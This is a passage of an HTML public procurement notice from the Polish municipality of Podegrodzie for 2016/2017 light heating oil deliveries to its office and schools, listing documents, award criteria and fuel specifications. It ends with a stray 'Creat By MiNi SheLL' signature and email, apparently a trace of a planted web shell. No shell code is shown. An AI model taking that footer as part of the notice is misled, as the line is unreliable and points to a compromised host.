<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony formularz ofertowy (załącznik nr 1),
b)	w sytuacji wykonawców działających przez pełnomocnika - pełnomocnictwo,
c)	w sytuacji oferty złożonej przez Wykonawców występujących wspólnie, pełnomocnictwo dla podmiotu uprawnionego do występowania w imieniu grupy Wykonawców zgodnie z art. 23 ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności faktur - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Szczegółowe informacje dotyczące umowy zawarte zostały w projekcie umowy stanowiący załącznik nr 7 a, b, c, d, e do niniejszej specyfikacji.
2.	Sytuacje, kiedy będzie możliwość zmiany umowy oraz warunki takich zmian określają szczegółowo projekt umowy stanowiący załącznik nr 7 a, b, c, d, e do specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.podegrodzie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Podegrodzie, 33-386 Podegrodzie 248, pokój nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2016 godzina 09:00, miejsce: Sala obsługi klienta Urzędu Gminy Podegrodzie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa oleju opałowego lekkiego do budynku Urzędu Gminy w Podegrodziu w sezonie grzewczym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Urzędu Gminy w Podegrodziu.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 23.000 litrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa oleju opałowego lekkiego do budynku Gimnazjum w Brzeznej w sezonie grzewczym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Gimnazjum 
w Brzeznej.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 22.000 litrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa oleju opałowego lekkiego do budynku Szkoły Podstawowej w Długołęce - Świerkli w sezonie grzewczym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Szkoły Podstawowej 
w Długołęce - Świerkli.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	 temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 18.000 litrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa oleju opałowego lekkiego do budynku Szkoły Podstawowej w Gostwicy w sezonie grzewczym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Szkoły Podstawowej 
w Gostwicy.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 20.000 litrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa oleju opałowego lekkiego do budynku Zespołu Szkół Podstawowo - Gimnazjalnych w Podegrodziu w sezonie grzewczym 2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> aa)	Zamówienie obejmuje dostawę oleju opałowego lekkiego do budynku Zespole Szkół Podstawowo - Gimnazjalnych w Podegrodziu.
bb)	Olej opałowy lekki będący przedmiotem zamówienia musi posiadać parametry techniczne:
1)	gęstość w temperaturze 15oC nie wyższa niż 0,860 g/ml,
2)	temperatura zapłonu nie niższa niż 56oC,
3)	lepkość kinematyczna w temperaturze 20oC nie większa niż 6,0 mm2/s,
4)	zawartość siarki nie więcej niż 0,10 %/m/m,
5)	pozostałość po skoksowaniu nie większa niż 0,3 %/m/m,
6)	pozostałość po spopieleniu nie większa niż 0,01 %/m/m,
7)	zawartość wody nie większa niż 200 mg/kg,
8)	zawartość stałych ciał obcych nie większa niż 24 mg/kg,
9)	wartość opałowa nie niższa niż 42,6 MJ/kg,
10)	temperatura płynięcia nie wyższa niż - 20oC.
cc)	Przewidywane zapotrzebowanie na olej opałowy lekki wynosi około 30.000 litrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.51.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności faktur - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com